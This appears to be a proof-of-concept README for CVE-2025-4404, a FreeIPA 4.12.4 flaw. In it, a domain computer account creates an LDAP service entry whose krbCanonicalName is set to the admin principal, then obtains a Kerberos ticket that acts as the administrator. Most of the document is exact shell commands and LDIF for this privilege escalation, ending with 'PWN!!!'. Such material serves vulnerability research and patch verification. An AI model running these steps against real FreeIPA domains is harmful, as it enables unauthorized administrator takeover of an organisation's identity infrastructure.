# CVE-2025-4404 POC
POC for CVE-2025-4404

If you have a domain computer account (host/pc1.test.local@test.local), then you can add the service by default. And you can set krbPrincipalName and krbCanonicalName. By default, the krbCanonicalName attribute value is missing for the FreeIPA 4.12.4 administrator account. You can request a Kerberos ticket with the value krbPrincipalName, but the ticket will contain the value krbCanonicalName.

Let's go

1) First, we will request a ticket on behalf of the computer account:
`$ kinit host/pc1.test.local@TEST.LOCAL -k -t /etc/krb5.keytab`

2) Add to LDAP service account:
```
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/pc1.test.local@TEST.LOCAL,cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/pc1.test.local@TEST.LOCAL
krbPrincipalName: test/pc1.test.local@TEST.LOCAL
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: admin@TEST.LOCAL
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
```

3) Request keytab
```
$ ipa-getkeytab -p test/pc1.test.local@TEST.LOCAL -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
```

4) Request ticket
`$ kinit --no-request-pac -k -t ./test.keytab test/pc1.test.local@TEST.LOCAL`

PWN!!!

You can check ticket by:
`ldapwhoami -H ldap://dc1.test.local`
